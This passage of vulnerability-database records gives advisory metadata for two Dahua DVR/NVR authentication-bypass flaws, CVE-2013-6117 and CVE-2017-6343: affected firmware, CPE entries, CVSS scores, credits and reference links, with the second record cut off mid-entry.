Vulnerability from variot - Updated: 2023-12-18 12:21Dahua DVR 2.608.0000.0 and 2.608.GV00.0 allows remote attackers to bypass authentication and obtain sensitive information including user credentials, change user passwords, clear log files, and perform other actions via a request to TCP port 37777. Dahua Security DVR Appliances is a digital video device developed by Dahua Technologies. Dahua Security DVR Appliances utilize thin clients such as PSS, mobile client interfaces such as iDMSS and the ActiveX control \"webrec.cab\" for access. These clients communicate with the management service (TCP 37777). An attacker can exploit this issue to bypass the authentication mechanism and perform unauthorized actions. This may aid in further attacks. Dahua DVR is a hard disk video recorder product of Dahua Company in China
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201407-0012",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dvr",
"scope": "eq",
"trust": 1.6,
"vendor": "dahuasecurity",
"version": "2.608.gv00.0"
},
{
"model": "dvr",
"scope": "eq",
"trust": 1.6,
"vendor": "dahuasecurity",
"version": "2.608.0000.0"
},
{
"model": "dvr",
"scope": "eq",
"trust": 0.8,
"vendor": "dahua",
"version": "2.608.0000.0"
},
{
"model": "dvr",
"scope": "eq",
"trust": 0.8,
"vendor": "dahua",
"version": "2.608.gv00.0"
},
{
"model": "security dvr appliances",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "2.608.0000.0"
},
{
"model": "security dvr appliances 2.608.gv00.0",
"scope": null,
"trust": 0.6,
"vendor": "dahua",
"version": null
},
{
"model": "dahua technology dvr appliances 2.608.gv00.0",
"scope": null,
"trust": 0.3,
"vendor": "",
"version": null
},
{
"model": "dahua technology dvr appliances",
"scope": "eq",
"trust": 0.3,
"vendor": "",
"version": "2.608.0000.0"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-14541"
},
{
"db": "BID",
"id": "63742"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-006612"
},
{
"db": "NVD",
"id": "CVE-2013-6117"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-262"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:dvr_firmware:2.608.0000.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:dvr_firmware:2.608.gv00.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2013-6117"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Jake Reynolds",
"sources": [
{
"db": "BID",
"id": "63742"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-262"
}
],
"trust": 0.9
},
"cve": "CVE-2013-6117",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2013-6117",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2013-14541",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-66119",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2013-6117",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2013-14541",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201311-262",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-66119",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2013-6117",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-14541"
},
{
"db": "VULHUB",
"id": "VHN-66119"
},
{
"db": "VULMON",
"id": "CVE-2013-6117"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-006612"
},
{
"db": "NVD",
"id": "CVE-2013-6117"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-262"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dahua DVR 2.608.0000.0 and 2.608.GV00.0 allows remote attackers to bypass authentication and obtain sensitive information including user credentials, change user passwords, clear log files, and perform other actions via a request to TCP port 37777. Dahua Security DVR Appliances is a digital video device developed by Dahua Technologies. Dahua Security DVR Appliances utilize thin clients such as PSS, mobile client interfaces such as iDMSS and the ActiveX control \\\"webrec.cab\\\" for access. These clients communicate with the management service (TCP 37777). \nAn attacker can exploit this issue to bypass the authentication mechanism and perform unauthorized actions. This may aid in further attacks. Dahua DVR is a hard disk video recorder product of Dahua Company in China",
"sources": [
{
"db": "NVD",
"id": "CVE-2013-6117"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-006612"
},
{
"db": "CNVD",
"id": "CNVD-2013-14541"
},
{
"db": "BID",
"id": "63742"
},
{
"db": "VULHUB",
"id": "VHN-66119"
},
{
"db": "VULMON",
"id": "CVE-2013-6117"
}
],
"trust": 2.61
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-66119",
"trust": 0.1,
"type": "unknown"
},
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=29673",
"trust": 0.1,
"type": "exploit"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-66119"
},
{
"db": "VULMON",
"id": "CVE-2013-6117"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2013-6117",
"trust": 3.5
},
{
"db": "OSVDB",
"id": "99783",
"trust": 2.6
},
{
"db": "PACKETSTORM",
"id": "124022",
"trust": 1.8
},
{
"db": "EXPLOIT-DB",
"id": "29673",
"trust": 1.8
},
{
"db": "BID",
"id": "63742",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2013-006612",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201311-262",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2013-14541",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-66119",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2013-6117",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-14541"
},
{
"db": "VULHUB",
"id": "VHN-66119"
},
{
"db": "VULMON",
"id": "CVE-2013-6117"
},
{
"db": "BID",
"id": "63742"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-006612"
},
{
"db": "NVD",
"id": "CVE-2013-6117"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-262"
}
]
},
"id": "VAR-201407-0012",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-14541"
},
{
"db": "VULHUB",
"id": "VHN-66119"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT",
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-14541"
}
]
},
"last_update_date": "2023-12-18T12:21:16.659000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.dahuasecurity.com/"
},
{
"title": "CVE-2013-6117",
"trust": 0.1,
"url": "https://github.com/milo2012/cve-2013-6117 "
},
{
"title": "Malware",
"trust": 0.1,
"url": "https://github.com/nsslabcuus/malware "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/jerry123s/all-poc "
},
{
"title": "BleepingComputer",
"trust": 0.1,
"url": "https://www.bleepingcomputer.com/news/security/passwords-for-tens-of-thousands-of-dahua-devices-cached-in-iot-search-engine/"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2013-6117"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-006612"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-287",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-66119"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-006612"
},
{
"db": "NVD",
"id": "CVE-2013-6117"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.9,
"url": "http://blog.depthsecurity.com/2013/11/dahua-dvr-authentication-bypass-cve.html"
},
{
"trust": 2.6,
"url": "http://www.osvdb.org/99783"
},
{
"trust": 2.1,
"url": "http://seclists.org/bugtraq/2013/nov/62"
},
{
"trust": 1.8,
"url": "http://www.exploit-db.com/exploits/29673"
},
{
"trust": 1.8,
"url": "http://packetstormsecurity.com/files/124022/dahua-dvr-authentication-bypass.html"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-6117"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-6117"
},
{
"trust": 0.7,
"url": "http://www.securityfocus.com/bid/63742"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/529799"
},
{
"trust": 0.3,
"url": "http://www.dahuasecurity.com/products_category/dvr-2.html"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/287.html"
},
{
"trust": 0.1,
"url": "https://github.com/milo2012/cve-2013-6117"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://www.exploit-db.com/exploits/29673/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-14541"
},
{
"db": "VULHUB",
"id": "VHN-66119"
},
{
"db": "VULMON",
"id": "CVE-2013-6117"
},
{
"db": "BID",
"id": "63742"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-006612"
},
{
"db": "NVD",
"id": "CVE-2013-6117"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-262"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2013-14541"
},
{
"db": "VULHUB",
"id": "VHN-66119"
},
{
"db": "VULMON",
"id": "CVE-2013-6117"
},
{
"db": "BID",
"id": "63742"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-006612"
},
{
"db": "NVD",
"id": "CVE-2013-6117"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-262"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-11-19T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-14541"
},
{
"date": "2014-07-11T00:00:00",
"db": "VULHUB",
"id": "VHN-66119"
},
{
"date": "2014-07-11T00:00:00",
"db": "VULMON",
"id": "CVE-2013-6117"
},
{
"date": "2013-11-13T00:00:00",
"db": "BID",
"id": "63742"
},
{
"date": "2014-07-15T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-006612"
},
{
"date": "2014-07-11T19:55:02.673000",
"db": "NVD",
"id": "CVE-2013-6117"
},
{
"date": "2013-11-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201311-262"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-11-20T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-14541"
},
{
"date": "2014-07-14T00:00:00",
"db": "VULHUB",
"id": "VHN-66119"
},
{
"date": "2014-07-14T00:00:00",
"db": "VULMON",
"id": "CVE-2013-6117"
},
{
"date": "2013-11-13T00:00:00",
"db": "BID",
"id": "63742"
},
{
"date": "2014-07-15T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-006612"
},
{
"date": "2014-07-14T13:33:28.517000",
"db": "NVD",
"id": "CVE-2013-6117"
},
{
"date": "2017-05-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201311-262"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201311-262"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dahua DVR Vulnerabilities that bypass authentication",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-006612"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "authorization issue",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201311-262"
}
],
"trust": 0.6
}
}
VAR-201702-1057
Vulnerability from variot - Updated: 2023-12-18 12:20The web interface on Dahua DHI-HCVR7216A-S3 devices with NVR Firmware 3.210.0001.10 2016-06-06, Camera Firmware 2.400.0000.28.R 2016-03-29, and SmartPSS Software 1.16.1 2017-01-19 allows remote attackers to obtain login access by leveraging knowledge of the MD5 Admin Hash without knowledge of the corresponding password, a different vulnerability than CVE-2013-6117. Dahua DHI-HCVR7216A-S3 is a network hard disk recorder product of Dahua Company of China. There is a security hole in the web interface of Dahua DHI-HCVR7216A-S3 device. A remote attacker can exploit a vulnerability to submit a special request that does not authorize access to the device. Dahua Security DVR Appliances are prone to an authentication-bypass vulnerability. An attacker can exploit this issue to bypass the authentication mechanism and perform unauthorized actions. This may aid in further attacks
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201702-1057",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "smartpss",
"scope": "eq",
"trust": 1.6,
"vendor": "dahuasecurity",
"version": "1.16.1"
},
{
"model": "camera",
"scope": "eq",
"trust": 1.6,
"vendor": "dahuasecurity",
"version": "2.400.0000.28.r"
},
{
"model": "nvr",
"scope": "eq",
"trust": 1.6,
"vendor": "dahuasecurity",
"version": "3.210.0001.10"
},
{
"model": "camera",
"scope": "eq",
"trust": 0.8,
"vendor": "dahua",
"version": "2.400.0000.28.r 2016-03-29"
},
{
"model": "nvr",
"scope": "eq",
"trust": 0.8,
"vendor": "dahua",
"version": "3.210.0001.10 2016-06-06"
},
{
"model": "smart pss",
"scope": "eq",
"trust": 0.8,
"vendor": "dahua",
"version": "1.16.1 2017-01-19"
},
{
"model": "security dhi-hcvr7216a-s3",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "3.210.0001.102016-06-06"
},
{
"model": "security camera 2.400.0000.28.r",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "2016-03-29"
},
{
"model": "security smartpss software",
"scope": "eq",
"trust": 0.6,
"vendor": "dahua",
"version": "1.16.12017-01-19"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-02551"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-002230"
},
{
"db": "NVD",
"id": "CVE-2017-6343"
},
{
"db": "CNNVD",
"id": "CNNVD-201702-918"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:nvr_firmware:3.210.0001.10:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:smartpss_firmware:1.16.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:camera_firmware:2.400.0000.28.r:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dhi-hcvr7216a-s3:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-6343"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Andrew Frahn Others.",
"sources": [
{
"db": "BID",
"id": "96449"
}
],
"trust": 0.3
},
"cve": "CVE-2017-6343",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.6,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 9.3,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2017-6343",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CNVD-2017-02551",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.6,
"id": "VHN-114546",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.2,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "High",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.1,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2017-6343",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-6343",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2017-02551",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201702-918",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-114546",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-02551"
},
{
"db": "VULHUB",
"id": "VHN-114546"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-002230"
},
{
"db": "NVD",
"id": "CVE-2017-6343"
},
{
"db": "CNNVD",
"id": "CNNVD-201702-918"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The web interface on Dahua DHI-HCVR7216A-S3 devices with NVR Firmware 3.210.0001.10 2016-06-06, Camera Firmware 2.400.0000.28.R 2016-03-29, and SmartPSS Software 1.16.1 2017-01-19 allows remote attackers to obtain login access by leveraging knowledge of the MD5 Admin Hash without knowledge of the corresponding password, a different vulnerability than CVE-2013-6117. Dahua DHI-HCVR7216A-S3 is a network hard disk recorder product of Dahua Company of China. There is a security hole in the web interface of Dahua DHI-HCVR7216A-S3 device. A remote attacker can exploit a vulnerability to submit a special request that does not authorize access to the device. Dahua Security DVR Appliances are prone to an authentication-bypass vulnerability. \nAn attacker can exploit this issue to bypass the authentication mechanism and perform unauthorized actions. This may aid in further attacks",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-6343"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-002230"
},
{
"db": "CNVD",
"id": "CNVD-2017-02551"
},
{
